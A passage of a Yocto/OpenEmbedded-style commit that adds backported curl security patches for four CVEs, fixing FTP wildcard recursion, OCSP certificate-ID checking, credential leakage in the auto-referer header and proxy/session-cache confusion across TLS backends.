@@ -0,0 +1,260 @@
+From 6fda045b19a9066701b5e09cfa657a13a3accbf3 Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Sat, 28 Nov 2020 00:27:21 +0100
+Subject: [PATCH] ftp: make wc_statemach loop instead of recurse
+
+CVE-2020-8285
+
+Fixes #6255
+Bug: https://curl.se/docs/CVE-2020-8285.html
+Reported-by: xnynx on github
+
+Upstream-commit: 69a358f2186e04cf44698b5100332cbf1ee7f01d
+Signed-off-by: Kamil Dudka <kdudka@redhat.com>
+
+Upstream-Status: Backport [import from fedora https://koji.fedoraproject.org/koji/fileinfo?rpmID=24270817&filename=0006-curl-7.69.1-CVE-2020-8285.patch]
+CVE: CVE-2020-8285
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ lib/ftp.c | 202 +++++++++++++++++++++++++++---------------------------
+ 1 file changed, 102 insertions(+), 100 deletions(-)
+
+diff --git a/lib/ftp.c b/lib/ftp.c
+index 57b22ad..3382772 100644
+--- a/lib/ftp.c
++++ b/lib/ftp.c
+@@ -3763,129 +3763,131 @@ static CURLcode init_wc_data(struct connectdata *conn)
+ return result;
+ }
+
+-/* This is called recursively */
+ static CURLcode wc_statemach(struct connectdata *conn)
+ {
+ struct WildcardData * const wildcard = &(conn->data->wildcard);
+ CURLcode result = CURLE_OK;
+
+- switch(wildcard->state) {
+- case CURLWC_INIT:
+- result = init_wc_data(conn);
+- if(wildcard->state == CURLWC_CLEAN)
+- /* only listing! */
+- break;
+- wildcard->state = result ? CURLWC_ERROR : CURLWC_MATCHING;
+- break;
++ for(;;) {
++ switch(wildcard->state) {
++ case CURLWC_INIT:
++ result = init_wc_data(conn);
++ if(wildcard->state == CURLWC_CLEAN)
++ /* only listing! */
++ return result;
++ wildcard->state = result ? CURLWC_ERROR : CURLWC_MATCHING;
++ return result;
+
+- case CURLWC_MATCHING: {
+- /* In this state is LIST response successfully parsed, so lets restore
+- previous WRITEFUNCTION callback and WRITEDATA pointer */
+- struct ftp_wc *ftpwc = wildcard->protdata;
+- conn->data->set.fwrite_func = ftpwc->backup.write_function;
+- conn->data->set.out = ftpwc->backup.file_descriptor;
+- ftpwc->backup.write_function = ZERO_NULL;
+- ftpwc->backup.file_descriptor = NULL;
+- wildcard->state = CURLWC_DOWNLOADING;
+-
+- if(Curl_ftp_parselist_geterror(ftpwc->parser)) {
+- /* error found in LIST parsing */
+- wildcard->state = CURLWC_CLEAN;
+- return wc_statemach(conn);
+- }
+- if(wildcard->filelist.size == 0) {
+- /* no corresponding file */
+- wildcard->state = CURLWC_CLEAN;
+- return CURLE_REMOTE_FILE_NOT_FOUND;
++ case CURLWC_MATCHING: {
++ /* In this state is LIST response successfully parsed, so lets restore
++ previous WRITEFUNCTION callback and WRITEDATA pointer */
++ struct ftp_wc *ftpwc = wildcard->protdata;
++ conn->data->set.fwrite_func = ftpwc->backup.write_function;
++ conn->data->set.out = ftpwc->backup.file_descriptor;
++ ftpwc->backup.write_function = ZERO_NULL;
++ ftpwc->backup.file_descriptor = NULL;
++ wildcard->state = CURLWC_DOWNLOADING;
++
++ if(Curl_ftp_parselist_geterror(ftpwc->parser)) {
++ /* error found in LIST parsing */
++ wildcard->state = CURLWC_CLEAN;
++ continue;
++ }
++ if(wildcard->filelist.size == 0) {
++ /* no corresponding file */
++ wildcard->state = CURLWC_CLEAN;
++ return CURLE_REMOTE_FILE_NOT_FOUND;
++ }
++ continue;
+ }
+- return wc_statemach(conn);
+- }
+
+- case CURLWC_DOWNLOADING: {
+- /* filelist has at least one file, lets get first one */
+- struct ftp_conn *ftpc = &conn->proto.ftpc;
+- struct curl_fileinfo *finfo = wildcard->filelist.head->ptr;
+- struct FTP *ftp = conn->data->req.protop;
++ case CURLWC_DOWNLOADING: {
++ /* filelist has at least one file, lets get first one */
++ struct ftp_conn *ftpc = &conn->proto.ftpc;
++ struct curl_fileinfo *finfo = wildcard->filelist.head->ptr;
++ struct FTP *ftp = conn->data->req.protop;
+
+- char *tmp_path = aprintf("%s%s", wildcard->path, finfo->filename);
+- if(!tmp_path)
+- return CURLE_OUT_OF_MEMORY;
++ char *tmp_path = aprintf("%s%s", wildcard->path, finfo->filename);
++ if(!tmp_path)
++ return CURLE_OUT_OF_MEMORY;
+
+- /* switch default ftp->path and tmp_path */
+- free(ftp->pathalloc);
+- ftp->pathalloc = ftp->path = tmp_path;
+-
+- infof(conn->data, "Wildcard - START of \"%s\"\n", finfo->filename);
+- if(conn->data->set.chunk_bgn) {
+- long userresponse;
+- Curl_set_in_callback(conn->data, true);
+- userresponse = conn->data->set.chunk_bgn(
+- finfo, wildcard->customptr, (int)wildcard->filelist.size);
+- Curl_set_in_callback(conn->data, false);
+- switch(userresponse) {
+- case CURL_CHUNK_BGN_FUNC_SKIP:
+- infof(conn->data, "Wildcard - \"%s\" skipped by user\n",
+- finfo->filename);
+- wildcard->state = CURLWC_SKIP;
+- return wc_statemach(conn);
+- case CURL_CHUNK_BGN_FUNC_FAIL:
+- return CURLE_CHUNK_FAILED;
++ /* switch default ftp->path and tmp_path */
++ free(ftp->pathalloc);
++ ftp->pathalloc = ftp->path = tmp_path;
++
++ infof(conn->data, "Wildcard - START of \"%s\"\n", finfo->filename);
++ if(conn->data->set.chunk_bgn) {
++ long userresponse;
++ Curl_set_in_callback(conn->data, true);
++ userresponse = conn->data->set.chunk_bgn(
++ finfo, wildcard->customptr, (int)wildcard->filelist.size);
++ Curl_set_in_callback(conn->data, false);
++ switch(userresponse) {
++ case CURL_CHUNK_BGN_FUNC_SKIP:
++ infof(conn->data, "Wildcard - \"%s\" skipped by user\n",
++ finfo->filename);
++ wildcard->state = CURLWC_SKIP;
++ continue;
++ case CURL_CHUNK_BGN_FUNC_FAIL:
++ return CURLE_CHUNK_FAILED;
++ }
+ }
+- }
+
+- if(finfo->filetype != CURLFILETYPE_FILE) {
+- wildcard->state = CURLWC_SKIP;
+- return wc_statemach(conn);
+- }
++ if(finfo->filetype != CURLFILETYPE_FILE) {
++ wildcard->state = CURLWC_SKIP;
++ continue;
++ }
+
+- if(finfo->flags & CURLFINFOFLAG_KNOWN_SIZE)
+- ftpc->known_filesize = finfo->size;
++ if(finfo->flags & CURLFINFOFLAG_KNOWN_SIZE)
++ ftpc->known_filesize = finfo->size;
+
+- result = ftp_parse_url_path(conn);
+- if(result)
+- return result;
++ result = ftp_parse_url_path(conn);
++ if(result)
++ return result;
+
+- /* we don't need the Curl_fileinfo of first file anymore */
+- Curl_llist_remove(&wildcard->filelist, wildcard->filelist.head, NULL);
++ /* we don't need the Curl_fileinfo of first file anymore */
++ Curl_llist_remove(&wildcard->filelist, wildcard->filelist.head, NULL);
+
+- if(wildcard->filelist.size == 0) { /* remains only one file to down. */
+- wildcard->state = CURLWC_CLEAN;
+- /* after that will be ftp_do called once again and no transfer
+- will be done because of CURLWC_CLEAN state */
+- return CURLE_OK;
++ if(wildcard->filelist.size == 0) { /* remains only one file to down. */
++ wildcard->state = CURLWC_CLEAN;
++ /* after that will be ftp_do called once again and no transfer
++ will be done because of CURLWC_CLEAN state */
++ return CURLE_OK;
++ }
++ return result;
+ }
+- } break;
+
+- case CURLWC_SKIP: {
+- if(conn->data->set.chunk_end) {
+- Curl_set_in_callback(conn->data, true);
+- conn->data->set.chunk_end(conn->data->wildcard.customptr);
+- Curl_set_in_callback(conn->data, false);
++ case CURLWC_SKIP: {
++ if(conn->data->set.chunk_end) {
++ Curl_set_in_callback(conn->data, true);
++ conn->data->set.chunk_end(conn->data->wildcard.customptr);
++ Curl_set_in_callback(conn->data, false);
++ }
++ Curl_llist_remove(&wildcard->filelist, wildcard->filelist.head, NULL);
++ wildcard->state = (wildcard->filelist.size == 0) ?
++ CURLWC_CLEAN : CURLWC_DOWNLOADING;
++ continue;
+ }
+- Curl_llist_remove(&wildcard->filelist, wildcard->filelist.head, NULL);
+- wildcard->state = (wildcard->filelist.size == 0) ?
+- CURLWC_CLEAN : CURLWC_DOWNLOADING;
+- return wc_statemach(conn);
+- }
+
+- case CURLWC_CLEAN: {
+- struct ftp_wc *ftpwc = wildcard->protdata;
+- result = CURLE_OK;
+- if(ftpwc)
+- result = Curl_ftp_parselist_geterror(ftpwc->parser);
++ case CURLWC_CLEAN: {
++ struct ftp_wc *ftpwc = wildcard->protdata;
++ result = CURLE_OK;
++ if(ftpwc)
++ result = Curl_ftp_parselist_geterror(ftpwc->parser);
+
+- wildcard->state = result ? CURLWC_ERROR : CURLWC_DONE;
+- } break;
++ wildcard->state = result ? CURLWC_ERROR : CURLWC_DONE;
++ return result;
++ }
+
+- case CURLWC_DONE:
+- case CURLWC_ERROR:
+- case CURLWC_CLEAR:
+- if(wildcard->dtor)
+- wildcard->dtor(wildcard->protdata);
+- break;
++ case CURLWC_DONE:
++ case CURLWC_ERROR:
++ case CURLWC_CLEAR:
++ if(wildcard->dtor)
++ wildcard->dtor(wildcard->protdata);
++ return result;
++ }
+ }
+-
+- return result;
++ /* UNREACHABLE */
+ }
+
+ /***********************************************************************
+--
+2.26.2
+
diff --git a/meta/recipes-support/curl/curl/CVE-2020-8286.patch b/meta/recipes-support/curl/curl/CVE-2020-8286.patch
new file mode 100644
index 0000000000..093562fe01
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2020-8286.patch
@@ -0,0 +1,133 @@
+From 43d1163b3730f715704240f7f6d31af289246873 Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Wed, 2 Dec 2020 23:01:11 +0100
+Subject: [PATCH] openssl: make the OCSP verification verify the certificate id
+
+CVE-2020-8286
+
+Reported by anonymous
+
+Bug: https://curl.se/docs/CVE-2020-8286.html
+
+Upstream-commit: d9d01672785b8ac04aab1abb6de95fe3072ae199
+Signed-off-by: Kamil Dudka <kdudka@redhat.com>
+
+Upstream-Status: Backport [import from fedora https://koji.fedoraproject.org/koji/fileinfo?rpmID=24270817&filename=0007-curl-7.71.1-CVE-2020-8286.patch ]
+CVE: CVE-2020-8286
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ lib/vtls/openssl.c | 83 ++++++++++++++++++++++++++++++----------------
+ 1 file changed, 54 insertions(+), 29 deletions(-)
+
+diff --git a/lib/vtls/openssl.c b/lib/vtls/openssl.c
+index 1d09cad..bcfd83b 100644
+--- a/lib/vtls/openssl.c
++++ b/lib/vtls/openssl.c
+@@ -1717,6 +1717,11 @@ static CURLcode verifystatus(struct connectdata *conn,
+ OCSP_BASICRESP *br = NULL;
+ X509_STORE *st = NULL;
+ STACK_OF(X509) *ch = NULL;
++ X509 *cert;
++ OCSP_CERTID *id = NULL;
++ int cert_status, crl_reason;
++ ASN1_GENERALIZEDTIME *rev, *thisupd, *nextupd;
++ int ret;
+
+ long len = SSL_get_tlsext_status_ocsp_resp(BACKEND->handle, &status);
+
+@@ -1785,43 +1790,63 @@ static CURLcode verifystatus(struct connectdata *conn,
+ goto end;
+ }
+
+- for(i = 0; i < OCSP_resp_count(br); i++) {
+- int cert_status, crl_reason;
+- OCSP_SINGLERESP *single = NULL;
+-
+- ASN1_GENERALIZEDTIME *rev, *thisupd, *nextupd;
++ /* Compute the certificate's ID */
++ cert = SSL_get_peer_certificate(BACKEND->handle);
++ if(!cert) {
++ failf(data, "Error getting peer certficate");
++ result = CURLE_SSL_INVALIDCERTSTATUS;
++ goto end;
++ }
+
+- single = OCSP_resp_get0(br, i);
+- if(!single)
+- continue;
++ for(i = 0; i < sk_X509_num(ch); i++) {
++ X509 *issuer = sk_X509_value(ch, i);
++ if(X509_check_issued(issuer, cert) == X509_V_OK) {
++ id = OCSP_cert_to_id(EVP_sha1(), cert, issuer);
++ break;
++ }
++ }
++ X509_free(cert);
+
+- cert_status = OCSP_single_get0_status(single, &crl_reason, &rev,
+- &thisupd, &nextupd);
++ if(!id) {
++ failf(data, "Error computing OCSP ID");
++ result = CURLE_SSL_INVALIDCERTSTATUS;
++ goto end;
++ }
+
+- if(!OCSP_check_validity(thisupd, nextupd, 300L, -1L)) {
+- failf(data, "OCSP response has expired");
+- result = CURLE_SSL_INVALIDCERTSTATUS;
+- goto end;
+- }
++ /* Find the single OCSP response corresponding to the certificate ID */
++ ret = OCSP_resp_find_status(br, id, &cert_status, &crl_reason, &rev,
++ &thisupd, &nextupd);
++ OCSP_CERTID_free(id);
++ if(ret != 1) {
++ failf(data, "Could not find certificate ID in OCSP response");
++ result = CURLE_SSL_INVALIDCERTSTATUS;
++ goto end;
++ }
+
+- infof(data, "SSL certificate status: %s (%d)\n",
+- OCSP_cert_status_str(cert_status), cert_status);
++ /* Validate the corresponding single OCSP response */
++ if(!OCSP_check_validity(thisupd, nextupd, 300L, -1L)) {
++ failf(data, "OCSP response has expired");
++ result = CURLE_SSL_INVALIDCERTSTATUS;
++ goto end;
++ }
+
+- switch(cert_status) {
+- case V_OCSP_CERTSTATUS_GOOD:
+- break;
++ infof(data, "SSL certificate status: %s (%d)\n",
++ OCSP_cert_status_str(cert_status), cert_status);
+
+- case V_OCSP_CERTSTATUS_REVOKED:
+- result = CURLE_SSL_INVALIDCERTSTATUS;
++ switch(cert_status) {
++ case V_OCSP_CERTSTATUS_GOOD:
++ break;
+
+- failf(data, "SSL certificate revocation reason: %s (%d)",
+- OCSP_crl_reason_str(crl_reason), crl_reason);
+- goto end;
++ case V_OCSP_CERTSTATUS_REVOKED:
++ result = CURLE_SSL_INVALIDCERTSTATUS;
++ failf(data, "SSL certificate revocation reason: %s (%d)",
++ OCSP_crl_reason_str(crl_reason), crl_reason);
++ goto end;
+
+- case V_OCSP_CERTSTATUS_UNKNOWN:
+- result = CURLE_SSL_INVALIDCERTSTATUS;
+- goto end;
+- }
++ case V_OCSP_CERTSTATUS_UNKNOWN:
++ default:
++ result = CURLE_SSL_INVALIDCERTSTATUS;
++ goto end;
+ }
+
+ end:
+--
+2.26.2
+
diff --git a/meta/recipes-support/curl/curl/CVE-2021-22876.patch b/meta/recipes-support/curl/curl/CVE-2021-22876.patch
new file mode 100644
index 0000000000..fc396aabef
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2021-22876.patch
@@ -0,0 +1,59 @@
+transfer: strip credentials from the auto-referer header field
+
+CVE-2021-22876
+
+Patch taken from Ubuntu curl 7.68.0-1ubuntu2.5.
+
+Bug: https://curl.se/docs/CVE-2021-22876.html
+Upstream-Status: backport
+---
+ lib/transfer.c | 25 +++++++++++++++++++++++--
+ 1 file changed, 23 insertions(+), 2 deletions(-)
+
+diff --git a/lib/transfer.c b/lib/transfer.c
+index e76834eb3..744e1c00b 100644
+--- a/lib/transfer.c
++++ b/lib/transfer.c
+@@ -1570,6 +1570,9 @@ CURLcode Curl_follow(struct Curl_easy *data,
+ data->set.followlocation++; /* count location-followers */
+
+ if(data->set.http_auto_referer) {
++ CURLU *u;
++ char *referer;
++
+ /* We are asked to automatically set the previous URL as the referer
+ when we get the next URL. We pick the ->url field, which may or may
+ not be 100% correct */
+@@ -1579,9 +1582,27 @@ CURLcode Curl_follow(struct Curl_easy *data,
+ data->change.referer_alloc = FALSE;
+ }
+
+- data->change.referer = strdup(data->change.url);
+- if(!data->change.referer)
++ /* Make a copy of the URL without crenditals and fragment */
++ u = curl_url();
++ if(!u)
++ return CURLE_OUT_OF_MEMORY;
++
++ uc = curl_url_set(u, CURLUPART_URL, data->change.url, 0);
++ if(!uc)
++ uc = curl_url_set(u, CURLUPART_FRAGMENT, NULL, 0);
++ if(!uc)
++ uc = curl_url_set(u, CURLUPART_USER, NULL, 0);
++ if(!uc)
++ uc = curl_url_set(u, CURLUPART_PASSWORD, NULL, 0);
++ if(!uc)
++ uc = curl_url_get(u, CURLUPART_URL, &referer, 0);
++
++ curl_url_cleanup(u);
++
++ if(uc || referer == NULL)
+ return CURLE_OUT_OF_MEMORY;
++
++ data->change.referer = referer;
+ data->change.referer_alloc = TRUE; /* yes, free this later */
+ }
+ }
+--
+2.20.1
+
diff --git a/meta/recipes-support/curl/curl/CVE-2021-22890.patch b/meta/recipes-support/curl/curl/CVE-2021-22890.patch
new file mode 100644
index 0000000000..8c0ecbfe7f
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2021-22890.patch
@@ -0,0 +1,464 @@
+vtls: add 'isproxy' argument to Curl_ssl_get/addsessionid()
+
+To make sure we set and extract the correct session.
+
+Patch taken from Ubuntu curl 7.68.0-1ubuntu2.5.
+
+CVE-2021-22890
+
+Reported-by: Mingtao Yang
+Bug: https://curl.se/docs/CVE-2021-22890.html
+Upstream-Status: backport
+---
+ lib/vtls/bearssl.c | 9 +++++---
+ lib/vtls/gtls.c | 9 +++++---
+ lib/vtls/mbedtls.c | 8 ++++---
+ lib/vtls/mesalink.c | 9 +++++---
+ lib/vtls/openssl.c | 52 ++++++++++++++++++++++++++++++++++----------
+ lib/vtls/schannel.c | 10 +++++----
+ lib/vtls/sectransp.c | 9 ++++----
+ lib/vtls/vtls.c | 9 ++++++--
+ lib/vtls/vtls.h | 2 ++
+ lib/vtls/wolfssl.c | 8 ++++---
+ 10 files changed, 88 insertions(+), 37 deletions(-)
+
+diff --git a/lib/vtls/bearssl.c b/lib/vtls/bearssl.c
+index 67f945831..32cb0a4c2 100644
+--- a/lib/vtls/bearssl.c
++++ b/lib/vtls/bearssl.c
+@@ -372,7 +372,8 @@ static CURLcode bearssl_connect_step1(struct connectdata *conn, int sockindex)
+ void *session;
+
+ Curl_ssl_sessionid_lock(conn);
+- if(!Curl_ssl_getsessionid(conn, &session, NULL, sockindex)) {
++ if(!Curl_ssl_getsessionid(conn, SSL_IS_PROXY() ? TRUE : FALSE,
++ &session, NULL, sockindex)) {
+ br_ssl_engine_set_session_parameters(&BACKEND->ctx.eng, session);
+ infof(data, "BearSSL: re-using session ID\n");
+ }
+@@ -560,10 +561,12 @@ static CURLcode bearssl_connect_step3(struct connectdata *conn, int sockindex)
+ return CURLE_OUT_OF_MEMORY;
+ br_ssl_engine_get_session_parameters(&BACKEND->ctx.eng, session);
+ Curl_ssl_sessionid_lock(conn);
+- incache = !(Curl_ssl_getsessionid(conn, &oldsession, NULL, sockindex));
++ incache = !(Curl_ssl_getsessionid(conn, SSL_IS_PROXY() ? TRUE : FALSE,
++ &oldsession, NULL, sockindex));
+ if(incache)
+ Curl_ssl_delsessionid(conn, oldsession);
+- ret = Curl_ssl_addsessionid(conn, session, 0, sockindex);
++ ret = Curl_ssl_addsessionid(conn, SSL_IS_PROXY() ? TRUE : FALSE,
++ session, 0, sockindex);
+ Curl_ssl_sessionid_unlock(conn);
+ if(ret) {
+ free(session);
+diff --git a/lib/vtls/gtls.c b/lib/vtls/gtls.c
+index 5f740eeba..46e149c7d 100644
+--- a/lib/vtls/gtls.c
++++ b/lib/vtls/gtls.c
+@@ -937,7 +937,8 @@ gtls_connect_step1(struct connectdata *conn,
+ size_t ssl_idsize;
+
+ Curl_ssl_sessionid_lock(conn);
+- if(!Curl_ssl_getsessionid(conn, &ssl_sessionid, &ssl_idsize, sockindex)) {
++ if(!Curl_ssl_getsessionid(conn, SSL_IS_PROXY() ? TRUE : FALSE,
++ &ssl_sessionid, &ssl_idsize, sockindex)) {
+ /* we got a session id, use it! */
+ gnutls_session_set_data(session, ssl_sessionid, ssl_idsize);
+
+@@ -1485,7 +1486,8 @@ gtls_connect_step3(struct connectdata *conn,
+ gnutls_session_get_data(session, connect_sessionid, &connect_idsize);
+
+ Curl_ssl_sessionid_lock(conn);
+- incache = !(Curl_ssl_getsessionid(conn, &ssl_sessionid, NULL,
++ incache = !(Curl_ssl_getsessionid(conn, SSL_IS_PROXY() ? TRUE : FALSE,
++ &ssl_sessionid, NULL,
+ sockindex));
+ if(incache) {
+ /* there was one before in the cache, so instead of risking that the
+@@ -1494,7 +1496,8 @@ gtls_connect_step3(struct connectdata *conn,
+ }
+
+ /* store this session id */
+- result = Curl_ssl_addsessionid(conn, connect_sessionid, connect_idsize,
++ result = Curl_ssl_addsessionid(conn, SSL_IS_PROXY() ? TRUE : FALSE,
++ connect_sessionid, connect_idsize,
+ sockindex);
+ Curl_ssl_sessionid_unlock(conn);
+ if(result) {
+diff --git a/lib/vtls/mbedtls.c b/lib/vtls/mbedtls.c
+index f057315f3..19df8478e 100644
+--- a/lib/vtls/mbedtls.c
++++ b/lib/vtls/mbedtls.c
+@@ -453,7 +453,8 @@ mbed_connect_step1(struct connectdata *conn,
+ void *old_session = NULL;
+
+ Curl_ssl_sessionid_lock(conn);
+- if(!Curl_ssl_getsessionid(conn, &old_session, NULL, sockindex)) {
++ if(!Curl_ssl_getsessionid(conn, SSL_IS_PROXY() ? TRUE : FALSE,
++ &old_session, NULL, sockindex)) {
+ ret = mbedtls_ssl_set_session(&BACKEND->ssl, old_session);
+ if(ret) {
+ Curl_ssl_sessionid_unlock(conn);
+@@ -709,6 +710,7 @@ mbed_connect_step3(struct connectdata *conn,
+ int ret;
+ mbedtls_ssl_session *our_ssl_sessionid;
+ void *old_ssl_sessionid = NULL;
++ bool isproxy = SSL_IS_PROXY() ? TRUE : FALSE;
+
+ our_ssl_sessionid = malloc(sizeof(mbedtls_ssl_session));
+ if(!our_ssl_sessionid)
+@@ -727,10 +729,10 @@ mbed_connect_step3(struct connectdata *conn,
+
+ /* If there's already a matching session in the cache, delete it */
+ Curl_ssl_sessionid_lock(conn);
+- if(!Curl_ssl_getsessionid(conn, &old_ssl_sessionid, NULL, sockindex))
++ if(!Curl_ssl_getsessionid(conn, isproxy, &old_ssl_sessionid, NULL, sockindex))
+ Curl_ssl_delsessionid(conn, old_ssl_sessionid);
+
+- retcode = Curl_ssl_addsessionid(conn, our_ssl_sessionid, 0, sockindex);
++ retcode = Curl_ssl_addsessionid(conn, isproxy, our_ssl_sessionid, 0, sockindex);
+ Curl_ssl_sessionid_unlock(conn);
+ if(retcode) {
+ mbedtls_ssl_session_free(our_ssl_sessionid);
+diff --git a/lib/vtls/mesalink.c b/lib/vtls/mesalink.c
+index cab1e390b..79d1e3dfa 100644
+--- a/lib/vtls/mesalink.c
++++ b/lib/vtls/mesalink.c
+@@ -263,7 +263,8 @@ mesalink_connect_step1(struct connectdata *conn, int sockindex)
+ void *ssl_sessionid = NULL;
+
+ Curl_ssl_sessionid_lock(conn);
+- if(!Curl_ssl_getsessionid(conn, &ssl_sessionid, NULL, sockindex)) {
++ if(!Curl_ssl_getsessionid(conn, SSL_IS_PROXY() ? TRUE : FALSE,
++ &ssl_sessionid, NULL, sockindex)) {
+ /* we got a session id, use it! */
+ if(!SSL_set_session(BACKEND->handle, ssl_sessionid)) {
+ Curl_ssl_sessionid_unlock(conn);
+@@ -347,12 +348,14 @@ mesalink_connect_step3(struct connectdata *conn, int sockindex)
+ bool incache;
+ SSL_SESSION *our_ssl_sessionid;
+ void *old_ssl_sessionid = NULL;
++ bool inproxy = SSL_IS_PROXY() ? TRUE : FALSE;
+
+ our_ssl_sessionid = SSL_get_session(BACKEND->handle);
+
+ Curl_ssl_sessionid_lock(conn);
+ incache =
+- !(Curl_ssl_getsessionid(conn, &old_ssl_sessionid, NULL, sockindex));
++ !(Curl_ssl_getsessionid(conn, isproxy, &old_ssl_sessionid,
++ NULL, sockindex));
+ if(incache) {
+ if(old_ssl_sessionid != our_ssl_sessionid) {
+ infof(data, "old SSL session ID is stale, removing\n");
+@@ -363,7 +366,7 @@ mesalink_connect_step3(struct connectdata *conn, int sockindex)
+
+ if(!incache) {
+ result = Curl_ssl_addsessionid(
+- conn, our_ssl_sessionid, 0 /* unknown size */, sockindex);
++ conn, isproxy, our_ssl_sessionid, 0 /* unknown size */, sockindex);
+ if(result) {
+ Curl_ssl_sessionid_unlock(conn);
+ failf(data, "failed to store ssl session");
+diff --git a/lib/vtls/openssl.c b/lib/vtls/openssl.c
+index 1d09cadca..64f43605a 100644
+--- a/lib/vtls/openssl.c
++++ b/lib/vtls/openssl.c
+@@ -422,12 +422,23 @@ static int ossl_get_ssl_conn_index(void)
+ */
+ static int ossl_get_ssl_sockindex_index(void)
+ {
+- static int ssl_ex_data_sockindex_index = -1;
+- if(ssl_ex_data_sockindex_index < 0) {
+- ssl_ex_data_sockindex_index = SSL_get_ex_new_index(0, NULL, NULL, NULL,
+- NULL);
++ static int sockindex_index = -1;
++ if(sockindex_index < 0) {
++ sockindex_index = SSL_get_ex_new_index(0, NULL, NULL, NULL, NULL);
+ }
+- return ssl_ex_data_sockindex_index;
++ return sockindex_index;
++}
++
++/* Return an extra data index for proxy boolean.
++ * This index can be used with SSL_get_ex_data() and SSL_set_ex_data().
++ */
++static int ossl_get_proxy_index(void)
++{
++ static int proxy_index = -1;
++ if(proxy_index < 0) {
++ proxy_index = SSL_get_ex_new_index(0, NULL, NULL, NULL, NULL);
++ }
++ return proxy_index;
+ }
+
+ static int passwd_callback(char *buf, int num, int encrypting,
+@@ -1079,7 +1090,8 @@ static int Curl_ossl_init(void)
+ #endif
+
+ /* Initialize the extra data indexes */
+- if(ossl_get_ssl_conn_index() < 0 || ossl_get_ssl_sockindex_index() < 0)
++ if(ossl_get_ssl_conn_index() < 0 || ossl_get_ssl_sockindex_index() < 0 ||
++ ossl_get_proxy_index() < 0)
+ return 0;
+
+ return 1;
+@@ -2341,8 +2353,10 @@ static int ossl_new_session_cb(SSL *ssl, SSL_SESSION *ssl_sessionid)
+ curl_socket_t *sockindex_ptr;
+ int connectdata_idx = ossl_get_ssl_conn_index();
+ int sockindex_idx = ossl_get_ssl_sockindex_index();
++ int proxy_idx = ossl_get_proxy_index();
++ bool isproxy;
+
+- if(connectdata_idx < 0 || sockindex_idx < 0)
++ if(connectdata_idx < 0 || sockindex_idx < 0 || proxy_idx < 0)
+ return 0;
+
+ conn = (struct connectdata*) SSL_get_ex_data(ssl, connectdata_idx);
+@@ -2355,13 +2369,18 @@ static int ossl_new_session_cb(SSL *ssl, SSL_SESSION *ssl_sessionid)
+ sockindex_ptr = (curl_socket_t*) SSL_get_ex_data(ssl, sockindex_idx);
+ sockindex = (int)(sockindex_ptr - conn->sock);
+
++ isproxy = SSL_get_ex_data(ssl, proxy_idx) ? TRUE : FALSE;
++
+ if(SSL_SET_OPTION(primary.sessionid)) {
+ bool incache;
+ void *old_ssl_sessionid = NULL;
+
+ Curl_ssl_sessionid_lock(conn);
+- incache = !(Curl_ssl_getsessionid(conn, &old_ssl_sessionid, NULL,
+- sockindex));
++ if(isproxy)
++ incache = FALSE;
++ else
++ incache = !(Curl_ssl_getsessionid(conn, isproxy,
++ &old_ssl_sessionid, NULL, sockindex));
+ if(incache) {
+ if(old_ssl_sessionid != ssl_sessionid) {
+ infof(data, "old SSL session ID is stale, removing\n");
+@@ -2371,7 +2390,7 @@ static int ossl_new_session_cb(SSL *ssl, SSL_SESSION *ssl_sessionid)
+ }
+
+ if(!incache) {
+- if(!Curl_ssl_addsessionid(conn, ssl_sessionid,
++ if(!Curl_ssl_addsessionid(conn, isproxy, ssl_sessionid,
+ 0 /* unknown size */, sockindex)) {
+ /* the session has been put into the session cache */
+ res = 1;
+@@ -2868,16 +2887,25 @@ static CURLcode ossl_connect_step1(struct connectdata *conn, int sockindex)
+ void *ssl_sessionid = NULL;
+ int connectdata_idx = ossl_get_ssl_conn_index();
+ int sockindex_idx = ossl_get_ssl_sockindex_index();
++ int proxy_idx = ossl_get_proxy_index();
+
+- if(connectdata_idx >= 0 && sockindex_idx >= 0) {
++ if(connectdata_idx >= 0 && sockindex_idx >= 0 && proxy_idx >= 0) {
+ /* Store the data needed for the "new session" callback.
+ * The sockindex is stored as a pointer to an array element. */
+ SSL_set_ex_data(BACKEND->handle, connectdata_idx, conn);
+ SSL_set_ex_data(BACKEND->handle, sockindex_idx, conn->sock + sockindex);
++#ifndef CURL_DISABLE_PROXY
++ SSL_set_ex_data(BACKEND->handle, proxy_idx, SSL_IS_PROXY() ? (void *) 1:
++ NULL);
++#else
++ SSL_set_ex_data(BACKEND->handle, proxy_idx, NULL);
++#endif
++
+ }
+
+ Curl_ssl_sessionid_lock(conn);
+- if(!Curl_ssl_getsessionid(conn, &ssl_sessionid, NULL, sockindex)) {
++ if(!Curl_ssl_getsessionid(conn, SSL_IS_PROXY() ? TRUE : FALSE,
++ &ssl_sessionid, NULL, sockindex)) {
+ /* we got a session id, use it! */
+ if(!SSL_set_session(BACKEND->handle, ssl_sessionid)) {
+ Curl_ssl_sessionid_unlock(conn);
+diff --git a/lib/vtls/schannel.c b/lib/vtls/schannel.c
+index f665ee340..a354ce95d 100644
+--- a/lib/vtls/schannel.c
++++ b/lib/vtls/schannel.c
+@@ -487,7 +487,8 @@ schannel_connect_step1(struct connectdata *conn, int sockindex)
+ /* check for an existing re-usable credential handle */
+ if(SSL_SET_OPTION(primary.sessionid)) {
+ Curl_ssl_sessionid_lock(conn);
+- if(!Curl_ssl_getsessionid(conn, (void **)&old_cred, NULL, sockindex)) {
++ if(!Curl_ssl_getsessionid(conn, SSL_IS_PROXY() ? TRUE : FALSE,
++ (void **)&old_cred, NULL, sockindex)) {
+ BACKEND->cred = old_cred;
+ DEBUGF(infof(data, "schannel: re-using existing credential handle\n"));
+
+@@ -1193,8 +1194,9 @@ schannel_connect_step3(struct connectdata *conn, int sockindex)
+ struct ssl_connect_data *connssl = &conn->ssl[sockindex];
+ SECURITY_STATUS sspi_status = SEC_E_OK;
+ CERT_CONTEXT *ccert_context = NULL;
++ bool isproxy = SSL_IS_PROXY();
+ #ifdef DEBUGBUILD
+- const char * const hostname = SSL_IS_PROXY() ? conn->http_proxy.host.name :
++ const char * const hostname = isproxy ? conn->http_proxy.host.name :
+ conn->host.name;
+ #endif
+ #ifdef HAS_ALPN
+@@ -1268,7 +1270,7 @@ schannel_connect_step3(struct connectdata *conn, int sockindex)
